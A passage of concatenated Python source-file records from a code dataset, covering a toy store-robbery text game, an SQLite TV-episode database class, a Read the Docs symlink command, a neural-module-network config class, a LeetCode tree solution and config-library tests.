' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' '] \n for SpaceList in Spaces:\n print(SpaceList)\n\n# Draws a line\ndef Line():\n print('------------------------')\n\n#Draws a yes no question\ndef YesOrNo():\n yesno = ['1. yes' , '2. no']\n for yesnoList in yesno:\n print(yesno)\ndef initiate():\n InitRobberyStr = ['INITIATING ROBBERY...', 'INITIATING ROBBERY...', 'INITIATING ROBBERY...']\n for InitRobberyList in InitRobberyStr:\n Line()\n print('INITIATING ROBBERY...')\n time.sleep(2)\n\n\n \n \n\n# Mother function of all functions(experimenting with scope issues) \ndef execRobbery():\n Line()\n #Lists potential robbery locations\n print('Locations: ')\n Locations = ['1. H&M' , '2. Louis Vuittion' , '3. Apple' , '4. Blue Mercury' ]\n for LocationList in Locations:\n print(LocationList)\n Line()\n \n# Lets user choose location\n SelectedLocation = input('Where would you like to rob? : ')\n if SelectedLocation == '1':\n SelectedLocationName = 'H&M'\n SecurityLevel = 1\n elif SelectedLocation == '2':\n SelectedLocationName = 'Louis Vuittion'\n SecurityLevel = 3\n elif SelectedLocation == '3':\n SelectedLocationName = 'Apple'\n SecurityLevel = 4\n elif SelectedLocation == '4':\n SelectedLocationName = 'Blue Mercury'\n SecurityLevel = 2\n else:\n Line()\n print('ERROR: Please enter a number from 1 to 3')\n Line()\n SelectedLocation = input('Where would you like to rob? : ')\n if SelectedLocation == '1':\n SelectedLocationName = 'H&M'\n Line()\n elif SelectedLocation == '2':\n SelectedLocationName = 'Louis Vuittion'\n Line()\n elif SelectedLocation == '3':\n SelectedLocationName = 'Apple'\n Line()\n elif SelectedLocation == '4':\n SelectedLocationName = 'Blue Mercury'\n Line()\n else:\n Line()\n print('ERROR: Please restart program')\n Line()\n \n print('Ok, you would like to rob ' + SelectedLocationName)\n Line()\n# Lists Equipment Packages\n print('Equipment Packages: ')\n EquipmentPackage = ['1. Amateur Shoplifter - $50' , '2. Professional Thief - $1500' , '3. Armed Mercenary - $7500']\n for EquipmentPackageList in EquipmentPackage:\n print(EquipmentPackageList)\n Line()\n# Asks user to select an Equipment Package\n SelectedPackage = input('What Equipment Package would you like? : ')\n if SelectedPackage == '1':\n EquipmentType = 'Amateur Shoplifter'\n Control = 1\n Line()\n elif SelectedPackage == '2':\n EquipmentType = 'Professional Thief'\n Control = 2\n Line()\n elif SelectedPackage == '3':\n EquipmentType = 'Armed Mercenary'\n Control = 3\n Line()\n else:\n Line()\n print('ERROR: Please enter a number from 1 to 3')\n Line()\n SelectedPackage = input('What Equipment Package would you like? : ')\n if SelectedPackage == '1':\n EquipmentType = 'Amateur Shoplifter'\n Line()\n elif SelectedPackage == '2':\n EquipmentType = 'Professional Thief'\n Line()\n elif SelectedPackage == '3':\n EquipmentType = 'Armed Mercenary'\n line()\n else:\n Line()\n print('ERROR: Restart Program')\n Line()\n print('Ok, ' + EquipmentType)\n Line()\n#Initiates the Robbery\n initiate = input('Would you like to initiate the robbery?: ')\n \n \n \n print(' ')\n print('ROBBERY INITIATED')\n Line()\n#Displays initial Police ETA\n InitialPrTime = (Control/SecurityLevel)**2\n print('POLICE ETA : ' + str(InitialPrTime) + ' minutes')\n Line()\n#Lists potential items based on the store\n print('Potential items to steal from ' + SelectedLocationName + \" : \")\n if SelectedLocation == '1':\n Items = ['1. Sweatshirt - $25' , '2. Jeans - $40', '3. Perfume - $60']\n for ItemList in Items:\n print(ItemList)\n elif SelectedLocation == '2':\n Items = ['1. Wallet - $115' , '2. Handbag - $225' , '3. Watch - $950']\n for ItemList in Items:\n print(ItemList)\n elif SelectedLocation == '3':\n Items = ['1. Airpods - $120' , '2. iPhone XS Max - $1250' , '3. MacPro - $10,000']\n for ItemList in Items:\n print(ItemList)\n elif SelectedLocation == '4':\n Items = ['1. Eyeshadow - $20' , '2. b&b Hair Soap - $45' , '3. Lamer Lotion - $99']\n for ItemList in Items:\n print(ItemList) \n else:\n print('ERROR')\n \n Line()\n#Allows the user to select the first item to steal\n FirstItem = input('What is the first item(s) you would like to steal? : ')\n if SelectedLocation == '1':\n if FirstItem == '1':\n FirstItemPrice = 25\n FirstItemName = 'Sweatshirt'\n elif FirstItem == '2':\n FirstItemPrice = 40\n FirstItemName = 'Jeans'\n elif FirstItem == '3':\n FirstItemPrice = 60\n FirstItemName = 'Perfume'\n else:\n print('ERROR')\n elif SelectedLocation == '2':\n if FirstItem == '1':\n FirstItemPrice = 115\n FirstItemName = 'Wallet'\n elif FirstItem == '2':\n FirstItemPrice = 225\n FirstItemName = \"Handbag\"\n elif FirstItem == '3':\n FirstItemPrice = 950\n FirstItemName = 'Watch'\n else:\n print('ERROR')\n elif SelectedLocation == '3':\n if FirstItem == '1':\n FirstItemPrice = 120\n FirstItemName = 'Airpod'\n elif FirstItem == '2':\n FirstItemPrice = 1250\n FirstItemName = 'iPhone XS Max'\n elif FirstItem == '3':\n FirstItemPrice = 10,000 \n FirstItemName = 'Mac Pro Desktop'\n else:\n print('ERROR')\n elif SelectedLocation == '4':\n if FirstItem == '1':\n FirstItemPrice = 20\n FirstItemName = 'Eyeshadow'\n elif FirstItem == '2':\n FirstItemPrice = 45\n FirstItemName = 'b&b Hair Soap'\n elif FirstItem == '3':\n FirstItemPrice = 99\n FirstItemName = 'Lamer Lotion'\n else: \n print('ERROR')\n Line()\n FirstItemQuantity = (input('How many: '))\n Line()\n #Changes the item name based on how many stolen\n if FirstItemQuantity > str(1):\n FirstItemName = FirstItemName + 's'\n else:\n FirstItemName = '1 ' + FirstItemName\n #calulates police response time after first steal\n FirstStealValue = int(FirstItemQuantity) * FirstItemPrice\n PrTime = float(InitialPrTime) -(float(FirstStealValue)**(1/Control)*0.0001)\n print('Initial=' + str(InitialPrTime))\n print('First steal=' + str(FirstStealValue))\n print('Prtime=' + str(PrTime))\n #tries to steal item\n print('Attempting to steal ' + FirstItemQuantity + ' ' + FirstItemName + '...')\n time.sleep(2)\n if PrTime <= 0:\n RobberyTwoStatus = 'failure'\n print('failure')\n else:\n print('robbery Two success')\n #mission failed message\n #\n print() \n#ALlows the user to select the second item to steal\n \n#Uses equipment type and item stolen to calculate police response time\n\nexecRobbery()\n\n \n \n","sub_path":"robberynew.py","file_name":"robberynew.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120057438","text":"import sqlite3\n\nfrom episode import Episode\nfrom episode_state import EpisodeState\nfrom tvshow import TVShow\n\n\nclass ExistsError(AttributeError):\n \"\"\"\n Raised when a tv show or an episode already exists in the database and\n someone tries to add it again\n \"\"\"\n pass\n\n\nclass NotFoundError(AttributeError):\n \"\"\"\n Raised when trying to access to an episode or tv show that does not exist\n in the database.\n \"\"\"\n\n\nclass Database:\n\n tables_script = \"\"\"\n CREATE TABLE IF NOT EXISTS show (\n id INT NOT NULL,\n name TEXT NOT NULL,\n\n PRIMARY KEY (name)\n );\n\n CREATE TABLE IF NOT EXISTS episode (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n hd INT NOT NULL,\n link TEXT NOT NULL,\n\n FOREIGN KEY(tvshow_name) REFERENCES show(name) ON DELETE CASCADE,\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS downloading (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS downloaded (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS stored (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n \"\"\"\n\n def __init__(self, db_file: str):\n self.connection = sqlite3.connect(db_file)\n\n # enable foreign keys support\n self.connection.execute('pragma foreign_keys=ON')\n # use a row factory to return the query results\n # this allows to access each row of the result by name\n self.connection.row_factory = sqlite3.Row\n\n # create the database schema if it is not already created\n self.connection.cursor().executescript(self.tables_script)\n\n def put_tvshow(self, tvshow: TVShow):\n \"\"\"\n Puts a new tv show in the database. If the tv show already exists in\n the database an ExistsError is raised.\n\n :param tvshow: tv show to put in the database.\n \"\"\"\n try:\n self.connection.cursor().execute(\n 'INSERT INTO show (id, name) VALUES (?, ?)',\n (tvshow.id, tvshow.name)\n )\n self.connection.commit()\n except sqlite3.IntegrityError:\n raise ExistsError(\n \"tv show '%s' already exists in the database\" % tvshow)\n\n def remove_tvshow(self, tvshow_id: int):\n pass\n\n def tvshows(self) -> list:\n \"\"\"\n Returns a list with all the tv shows in the database.\n :return: list with all the tv shows in the database.\n \"\"\"\n cursor = self.connection.cursor()\n cursor.execute('SELECT name, id FROM show')\n\n item = cursor.fetchone()\n while item:\n # noinspection PyTypeChecker\n yield TVShow(item['id'], item['name'])\n item = cursor.fetchone()\n\n def put_episode(self, episode: Episode):\n try:\n self.connection.cursor().execute(\n 'INSERT INTO episode VALUES (?, ?, ?, ?, ?)',\n (episode.tvshow_name, episode.season, episode.number,\n episode.hd, episode.link)\n )\n self.connection.commit()\n except sqlite3.IntegrityError:\n raise ExistsError(\n \"episode '%s' already exists in the database\" % episode)\n\n def set_state(self, episode: Episode, state: EpisodeState):\n try:\n # remove from all state tables\n for state_table in EpisodeState.__members__.values():\n self.connection.cursor().execute(\n 'DELETE FROM ' + str(state_table) + ' '\n 'WHERE tvshow_name = ? AND season = ? AND number = ?',\n (episode.tvshow_name, episode.season, episode.number)\n )\n\n self.connection.cursor().execute(\n 'INSERT INTO ' + str(state) + ' VALUES (?, ?, ?)',\n (episode.tvshow_name, episode.season, episode.number)\n )\n\n self.connection.commit()\n\n except sqlite3.IntegrityError:\n raise NotFoundError(\"episode '%s' does no exist\" % episode)\n\n def episodes(self, state: EpisodeState = None):\n \"\"\"\n Iterates through the episodes with the given state. If state is None\n (default) then iterates through all episodes.\n\n :param state: state of the episodes to be returned.\n :return: list with the episode with the given state.\n \"\"\"\n\n if state:\n cursor = self._state_episodes(state)\n else:\n cursor = self._all_episodes()\n\n item = cursor.fetchone()\n while item:\n # noinspection PyTypeChecker\n yield Episode(item['tvshow_name'], item['season'], item['number'],\n bool(item['hd']), item['link'])\n item = cursor.fetchone()\n\n def _state_episodes(self, state: EpisodeState):\n cursor = self.connection.cursor()\n cursor.execute('SELECT * FROM episode INNER JOIN ' + str(state) + ' '\n 'AS state '\n 'ON episode.tvshow_name = state.tvshow_name '\n 'AND episode.season = state.season '\n 'AND episode.number = state.number')\n return cursor\n\n def _all_episodes(self):\n cursor = self.connection.cursor()\n cursor.execute('SELECT * FROM episode')\n return cursor\n\n # TODO use generators to implement tvshows() and episodes()\n\n def episode_exists(self, episode) -> bool:\n cursor = self.connection.cursor()\n cursor.execute('SELECT * '\n 'FROM episode '\n 'WHERE tvshow_name = ? '\n 'AND season = ? '\n 'AND number = ?',\n (episode.tvshow_name, episode.season, episode.number))\n return cursor.fetchone() is not None\n\n def __del__(self):\n self.connection.close()\n","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238573484","text":"import logging\n\nfrom django.core.management.base import BaseCommand\n\nfrom readthedocs.projects import tasks\n\nfrom readthedocs.projects.models import Project\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('projects', nargs='+', type=str)\n\n def handle(self, *args, **options):\n projects = options['projects']\n if 'all' in projects:\n queryset = Project.objects.all()\n else:\n queryset = Project.objects.filter(slug__in=projects)\n for proj in queryset:\n tasks.symlink_project(project_pk=proj.pk)\n","sub_path":"readthedocs/core/management/commands/symlink.py","file_name":"symlink.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623172396","text":"r\"\"\"This module provides package-wide configuration management.\"\"\"\nfrom typing import Any, List\n\nfrom yacs.config import CfgNode as CN\n\n\nclass Config(object):\n r\"\"\"\n A collection of all the required configuration parameters. This class is a nested dict-like\n structure, with nested keys accessible as attributes. It contains sensible default values for\n all the parameters, which may be overriden by (first) through a YAML file and (second) through\n a list of attributes and values.\n\n Extended Summary\n ----------------\n This class definition contains default values corresponding to ``joint_training`` phase, as it\n is the final training phase and uses almost all the configuration parameters. Modification of\n any parameter after instantiating this class is not possible, so you must override required\n parameter values in either through ``config_yaml`` file or ``config_override`` list.\n\n Parameters\n ----------\n config_yaml: str\n Path to a YAML file containing configuration parameters to override.\n config_override: List[Any], optional (default= [])\n A list of sequential attributes and values of parameters to override. This happens after\n overriding from YAML file.\n\n Examples\n --------\n Let a YAML file named \"config.yaml\" specify these parameters to override::\n\n ALPHA: 1000.0\n BETA: 0.5\n\n >>> _C = Config(\"config.yaml\", [\"OPTIM.BATCH_SIZE\", 2048, \"BETA\", 0.7])\n >>> _C.ALPHA # default: 100.0\n 1000.0\n >>> _C.BATCH_SIZE # default: 256\n 2048\n >>> _C.BETA # default: 0.1\n 0.7\n\n Attributes\n ----------\n RANDOM_SEED: 0\n Random seed for NumPy and PyTorch, important for reproducibility.\n\n PHASE: \"joint_training\"\n Which phase to train (or evaluate) on? One of ``program_prior``, ``question_coding``,\n ``module_training`` or ``joint_training``.\n\n SUPERVISION: 1000\n Number of training examples where questions have paired ground-truth programs. These\n examples are chosen randomly (no stochasticity for a fixe ``RANDOM_SEED``).\n\n SUPERVISION_QUESTION_MAX_LENGTH: 40\n Maximum length of questions to be considered for choosing ``SUPERVISION`` number of\n training examples. Longer questions will not have paired ground-truth programs by default.\n\n OBJECTIVE: \"ours\"\n Training objective, ``baseline`` - only use ``SUPERVISION`` examples for training.\n truth programs, and ``ours`` - use the whole dataset for training.\n __________\n\n DATA:\n Collection of required data paths for training and evaluation. All these are assumed to be\n relative to project root directory. If elsewhere, symlinking is recommended.\n\n DATA.VOCABULARY: \"clevr_vocabulary\"\n Path to a directory containing CLEVR v1.0 vocabulary (readable by AllenNLP).\n\n DATA.TRAIN_TOKENS: \"data/clevr_train_tokens.h5\"\n Path to H5 file containing tokenized programs, questions and answers, and corresponding\n image indices for CLEVR v1.0 train split.\n\n DATA.TRAIN_FEATURES: \"data/clevr_train_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 train images.\n\n DATA.VAL_TOKENS: \"data/clevr_val_tokens.h5\"\n Path to H5 file containing tokenized programs, questions and answers, and corresponding\n image indices for CLEVR v1.0 val split.\n\n DATA.VAL_FEATURES: \"data/clevr_val_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 val images.\n\n DATA.TEST_TOKENS: \"data/clevr_test_tokens.h5\"\n Path to H5 file containing tokenized questions, and corresponding image indices for CLEVR\n v1.0 test split.\n\n DATA.TEST_FEATURES: \"data/clevr_test_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 test images.\n __________\n\n PROGRAM_PRIOR:\n Parameters controlling the model architecture of Program Prior (LSTM language model).\n\n PROGRAM_PRIOR.INPUT_SIZE: 256\n The dimension of the inputs to the LSTM.\n\n PROGRAM_PRIOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the LSTM.\n\n PROGRAM_PRIOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n PROGRAM_PRIOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n PROGRAM_GENERATOR:\n Parameters controlling the model architecture of Program Generator (Seq2Seq model). Here,\n the model encodes questions and decodes programs.\n\n PROGRAM_GENERATOR.INPUT_SIZE: 256\n The dimension of the inputs to the encoder and decoder.\n\n PROGRAM_GENERATOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the encoder and decoder.\n\n PROGRAM_GENERATOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n PROGRAM_GENERATOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n QUESTION_RECONSTRUCTOR:\n Parameters controlling the model architecture of Question Reconstructor (Seq2Seq model).\n Here, the model encodes programs and decodes questions.\n\n QUESTION_RECONSTRUCTOR.INPUT_SIZE: 256\n The dimension of the inputs to the encoder and decoder.\n\n QUESTION_RECONSTRUCTOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the encoder and decoder.\n\n QUESTION_RECONSTRUCTOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n QUESTION_RECONSTRUCTOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n NMN:\n Parameters controlling the model architecture of Neural Module Network. Here, the model\n takes an image and a program, lays out a pipeline of neural modules and executes it to\n get an answer.\n\n NMN.IMAGE_FEATURE_SIZE: [1024, 14, 14]\n Shape of input image features, in the form (channel, height, width).\n\n NMN.MODULE_CHANNELS: 128\n Number of channels for each neural module's convolutional blocks.\n\n NMN.CLASS_PROJECTION_CHANNELS: 1024\n Number of channels in projected final feature map (input to classifier).\n\n NMN.CLASSIFIER_LINEAR_SIZE: 1024\n Size of input to the classifier.\n __________\n\n ALPHA: 100.0\n Supervision scaling co-efficient. The negative log-likelihood loss of program generation\n and question reconstruction for examples with (GT) program supervision is scaled by this\n factor. Used during question coding and joint training.\n\n BETA: 0.1\n KL co-efficient. KL-divergence in ELBO is scaled by this factor. Used during question\n coding and joint training.\n\n GAMMA: 1.0\n Answer log-likelihood scaling co-efficient during joint training.\n\n DELTA: 0.99\n Decay co-efficient for moving average REINFORCE baseline. Used during question coding and\n joint training.\n __________\n\n OPTIM:\n Optimization hyper-parameters, relevant during training a particular phase.\n\n OPTIM.BATCH_SIZE: 256\n Batch size during training and evaluation.\n\n OPTIM.NUM_ITERATIONS: 20000\n Number of iterations to train for, batches are randomly sampled.\n\n OPTIM.WEIGHT_DECAY: 0.0\n Weight decay co-efficient for the optimizer.\n\n OPTIM.LR_INITIAL: 0.00001\n Initial learning rate for :class:`torch.optim.lr_scheduler.ReduceLROnPlateau`.\n\n OPTIM.LR_GAMMA: 0.5\n Factor to scale learning rate when an observed metric plateaus.\n\n OPTIM.LR_PATIENCE: 3\n Number of validation steps to wait and observe improvement in observed metric, before\n reducing the learning rate.\n __________\n\n CHECKPOINTS:\n Paths to pre-trained checkpoints of a particular phase to be used in subsequent phases.\n\n CHECKPOINTS.PROGRAM_PRIOR: \"checkpoints/program_prior_best.pth\"\n Path to pre-trained Program Prior checkpoint. Used during question coding and joint\n training.\n\n CHECKPOINTS.QUESTION_CODING: \"checkpoints/question_coding_1000_baseline_best.pth\"\n Path to pre-trained question coding checkpoint containing Program Prior (unchanged from\n ``program_prior`` phase), Program generator and Question Reconstructor. Used during\n module training and joint training.\n\n CHECKPOINTS.MODULE_TRAINING: \"checkpoints/module_training_1000_baseline_best.pth\"\n Path to pre-trained question coding checkpoint containing Program Generator (unchanged\n from ``question_coding`` phase) and Neural Module Network. Used during joint training.\n \"\"\"\n\n def __init__(self, config_yaml: str, config_override: List[Any] = []):\n\n self._C = CN()\n self._C.RANDOM_SEED = 0\n\n self._C.PHASE = \"joint_training\"\n self._C.SUPERVISION = 1000\n self._C.SUPERVISION_QUESTION_MAX_LENGTH = 40\n self._C.OBJECTIVE = \"ours\"\n\n self._C.DATA = CN()\n self._C.DATA.VOCABULARY = \"data/clevr_vocabulary\"\n\n self._C.DATA.TRAIN = CN()\n self._C.DATA.TRAIN_TOKENS = \"data/clevr_train_tokens.h5\"\n self._C.DATA.TRAIN_FEATURES = \"data/clevr_train_features.h5\"\n\n self._C.DATA.VAL = CN()\n self._C.DATA.VAL_TOKENS = \"data/clevr_val_tokens.h5\"\n self._C.DATA.VAL_FEATURES = \"data/clevr_val_features.h5\"\n\n self._C.DATA.TEST = CN()\n self._C.DATA.TEST_TOKENS = \"data/clevr_test_tokens.h5\"\n self._C.DATA.TEST_FEATURES = \"data/clevr_test_features.h5\"\n\n self._C.PROGRAM_PRIOR = CN()\n self._C.PROGRAM_PRIOR.INPUT_SIZE = 256\n self._C.PROGRAM_PRIOR.HIDDEN_SIZE = 256\n self._C.PROGRAM_PRIOR.NUM_LAYERS = 2\n self._C.PROGRAM_PRIOR.DROPOUT = 0.0\n\n self._C.PROGRAM_GENERATOR = CN()\n self._C.PROGRAM_GENERATOR.INPUT_SIZE = 256\n self._C.PROGRAM_GENERATOR.HIDDEN_SIZE = 256\n self._C.PROGRAM_GENERATOR.NUM_LAYERS = 2\n self._C.PROGRAM_GENERATOR.DROPOUT = 0.0\n\n self._C.QUESTION_RECONSTRUCTOR = CN()\n self._C.QUESTION_RECONSTRUCTOR.INPUT_SIZE = 256\n self._C.QUESTION_RECONSTRUCTOR.HIDDEN_SIZE = 256\n self._C.QUESTION_RECONSTRUCTOR.NUM_LAYERS = 2\n self._C.QUESTION_RECONSTRUCTOR.DROPOUT = 0.0\n\n self._C.NMN = CN()\n self._C.NMN.IMAGE_FEATURE_SIZE = [1024, 14, 14]\n self._C.NMN.MODULE_CHANNELS = 128\n self._C.NMN.CLASS_PROJECTION_CHANNELS = 1024\n self._C.NMN.CLASSIFIER_LINEAR_SIZE = 1024\n\n self._C.ALPHA = 100.0\n self._C.BETA = 0.1\n self._C.GAMMA = 1.0\n self._C.DELTA = 0.99\n\n self._C.OPTIM = CN()\n self._C.OPTIM.BATCH_SIZE = 256\n self._C.OPTIM.NUM_ITERATIONS = 20000\n self._C.OPTIM.WEIGHT_DECAY = 0.0\n\n self._C.OPTIM.LR_INITIAL = 0.00001\n self._C.OPTIM.LR_GAMMA = 0.5\n self._C.OPTIM.LR_PATIENCE = 3\n\n self._C.CHECKPOINTS = CN()\n self._C.CHECKPOINTS.PROGRAM_PRIOR = \"checkpoints/program_prior_best.pth\"\n self._C.CHECKPOINTS.QUESTION_CODING = \"checkpoints/question_coding_1000_ours_best.pth\"\n self._C.CHECKPOINTS.MODULE_TRAINING = \"checkpoints/module_training_1000_ours_best.pth\"\n\n # Override parameter values from YAML file first, then from override list.\n self._C.merge_from_file(config_yaml)\n self._C.merge_from_list(config_override)\n\n # Make an instantiated object of this class immutable.\n self._C.freeze()\n\n def dump(self, file_path: str):\n r\"\"\"Save config at the specified file path.\n\n Parameters\n ----------\n file_path: str\n (YAML) path to save config at.\n \"\"\"\n self._C.dump(stream=open(file_path, \"w\"))\n\n def __getattr__(self, attr: str):\n return self._C.__getattr__(attr)\n\n def __str__(self):\n return _config_str(self)\n\n def __repr__(self):\n return self._C.__repr__()\n\n\ndef _config_str(config: Config) -> str:\n r\"\"\"\n Collect a subset of config in sensible order (not alphabetical) according to phase. Used by\n :func:`Config.__str__()`.\n\n Parameters\n ----------\n config: Config\n A :class:`Config` object which is to be printed.\n \"\"\"\n _C = config\n\n __C: CN = CN({\"PHASE\": _C.PHASE, \"RANDOM_SEED\": _C.RANDOM_SEED})\n common_string: str = str(__C) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n __C = CN() # type: ignore\n __C.OBJECTIVE = _C.OBJECTIVE\n __C.SUPERVISION = _C.SUPERVISION\n __C.SUPERVISION_QUESTION_MAX_LENGTH = _C.SUPERVISION_QUESTION_MAX_LENGTH\n common_string += str(__C) + \"\\n\"\n\n common_string += str(_C.DATA) + \"\\n\"\n\n if _C.PHASE in {\"program_prior\", \"question_coding\", \"joint_training\"}:\n common_string += str(CN({\"PROGRAM_PRIOR\": _C.PROGRAM_PRIOR})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"module_training\", \"joint_training\"}:\n common_string += str(CN({\"PROGRAM_GENERATOR\": _C.PROGRAM_GENERATOR})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n common_string += str(CN({\"QUESTION_RECONSTRUCTOR\": _C.QUESTION_RECONSTRUCTOR})) + \"\\n\"\n\n if _C.PHASE in {\"module_training\", \"joint_training\"}:\n common_string += str(CN({\"NMN\": _C.NMN})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n __C = CN() # type: ignore\n __C.ALPHA = _C.ALPHA\n __C.BETA = _C.BETA\n __C.DELTA = _C.DELTA\n if _C.PHASE == \"joint_training\":\n __C.GAMMA = _C.GAMMA\n common_string += str(__C) + \"\\n\"\n\n common_string += str(CN({\"OPTIM\": _C.OPTIM})) + \"\\n\"\n\n if _C.PHASE == \"question_coding\":\n __C = CN()\n __C.CHECKPOINTS = CN({\"PROGRAM_PRIOR\": _C.CHECKPOINTS.PROGRAM_PRIOR})\n elif _C.PHASE == \"module_training\":\n __C = CN()\n __C.CHECKPOINTS = CN({\"QUESTION_CODING\": _C.CHECKPOINTS.QUESTION_CODING})\n elif _C.PHASE == \"joint_training\":\n __C = CN()\n __C.CHECKPOINTS = CN()\n __C.CHECKPOINTS.QUESTION_CODING = _C.CHECKPOINTS.QUESTION_CODING\n __C.CHECKPOINTS.MODULE_TRAINING = _C.CHECKPOINTS.MODULE_TRAINING\n else:\n __C = CN()\n\n common_string += str(__C) + \"\\n\"\n return common_string\n","sub_path":"probnmn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388820649","text":"################################################################\n# Author : yiorgosynkl (find me in Github: https://github.com/yiorgosynkl)\n# Date created : 20200507\n# Problem link : https://leetcode.com/problems/cousins-in-binary-tree/\n################################################################\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n x_list = []\n y_list = []\n queue = [(root, 0, None)] # (node, depth, father)\n while True:\n if not queue:\n break\n node, level, father = queue.pop(0)\n if node: # not null\n if node.val == x:\n x_list.append((level, father))\n if node.val == y:\n y_list.append((level, father))\n # print(node.val, level)\n queue.append((node.left, level+1, node))\n queue.append((node.right, level+1, node))\n for x_lev, x_fath in x_list:\n for y_lev, y_fath in y_list:\n if x_lev == y_lev and x_fath != y_fath:\n return True\n return False\n \n # assuming that x or y are found once, author: rock\n # def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n # q, depth, xDepth, yDepth = [root], 0, -1, -2\n # while q:\n # q2 = []\n # depth += 1\n # for node in q:\n # sameParent = 0\n # for child in (node.left, node.right):\n # if child:\n # q2.append(child)\n # if child.val == x:\n # xDepth = depth\n # sameParent += 1\n # elif child.val == y:\n # yDepth = depth\n # sameParent += 1\n # if sameParent == 2:\n # return False \n # q = q2 \n # return xDepth == yDepth\n","sub_path":"30_day_challenge_2020_May/993_cousins_in_binary_tree_day07.py","file_name":"993_cousins_in_binary_tree_day07.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180394089","text":"\"\"\"Integration tests for the moment.\n\"\"\"\n\nfrom pyobjconfig import PydanticBaseModel, ConfigurableObject, ConfigurableSwitch\n\nimport argparse\nimport os\nimport pydantic\nimport pytest\nimport typing\n\ndef test_basic():\n class BaseObject(ConfigurableObject):\n class config(PydanticBaseModel):\n a: int = 8\n b: str = 'hello world'\n\n def run(self):\n print(f'a: {self.config.a}, b: {self.config.b}')\n\n ap = argparse.ArgumentParser(description=__doc__)\n BaseObject.argparse_setup(ap)\n\n args = ap.parse_args([]).__dict__\n obj = BaseObject.argparse_create(args)\n obj.run()\n\n assert obj.config.a == 8\n assert obj.config.b == 'hello world'\n\n args = ap.parse_args(['--a', '99']).__dict__\n obj = BaseObject.argparse_create(args)\n assert obj.config.a == 99\n\n args = ap.parse_args(['--b', 'yodel']).__dict__\n obj = BaseObject.argparse_create(args)\n assert obj.config.b == 'yodel'\n\n with pytest.raises(TypeError) as exc:\n args = ap.parse_args(['--a', 'yodel']).__dict__\n print(args)\n obj = BaseObject.argparse_create(args)\n\n\ndef test_enum():\n class A(ConfigurableObject):\n def get(self):\n return 'A'\n class B(ConfigurableObject):\n def get(self):\n return 'B'\n class Base(ConfigurableObject):\n child = ConfigurableSwitch({\n 'a': A,\n 'b': B,\n })\n\n with pytest.raises(ValueError) as exc:\n Base.argparse_create({})\n assert 'Must specify child' in str(exc.value)\n assert 'A' == Base.argparse_create({'child': 'a'}).child.get()\n assert 'B' == Base.argparse_create({'child': 'b'}).child.get()\n\n\ndef test_env():\n class Base(ConfigurableObject):\n class config(PydanticBaseModel):\n test: str = 'testing'\n old = os.environ\n try:\n os.environ = os.environ.copy()\n b = Base.argparse_create({}, env='BLEEP')\n assert b.config.test == 'testing'\n\n os.environ['BLEEP_TEST'] = 'yay!'\n\n b = Base.argparse_create({}, env='BLEEP')\n assert b.config.test == 'yay!'\n b = Base.argparse_create({}, env='BLEEP2')\n assert b.config.test == 'testing'\n finally:\n os.environ = old\n\n\ndef test_list():\n class A(ConfigurableObject):\n class config(PydanticBaseModel):\n thing: typing.List[int] = [1]\n\n ap = argparse.ArgumentParser(description=__doc__)\n A.argparse_setup(ap)\n\n args = A.argparse_create(ap.parse_args([]).__dict__)\n assert args.config.thing == [1]\n args = 